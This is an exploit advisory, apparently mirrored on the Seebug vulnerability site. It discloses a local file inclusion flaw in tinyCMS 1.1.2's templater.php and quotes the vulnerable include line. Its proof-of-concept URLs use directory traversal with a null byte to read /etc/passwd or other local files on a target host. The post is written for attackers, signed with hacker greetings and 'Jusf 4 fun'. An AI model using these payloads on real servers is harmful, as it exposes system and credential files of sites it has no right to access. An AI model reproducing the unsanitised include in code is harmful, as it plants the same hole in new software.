&#65279;######################################################################################## # # Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability # Author : cOndemned [ Dark-Coders ] # Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z # Conditions : Magic quotes gpc = Off / Register Globals = On # Other info : Prior versions probably are vulnerable too # ######################################################################################## Source of /modules/ZZ_Templater/templater.php [ ... ] 17. $ftemplatedir = 'templates/'.$config['template'].'/'; 18. include('templates/'.$config['template'].'/data.php'); // <--- LFI 19. if($tdata['useblocks'] == 1) [ ... ] Proof of Concept : http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00 http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00 Jusf 4 fun
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论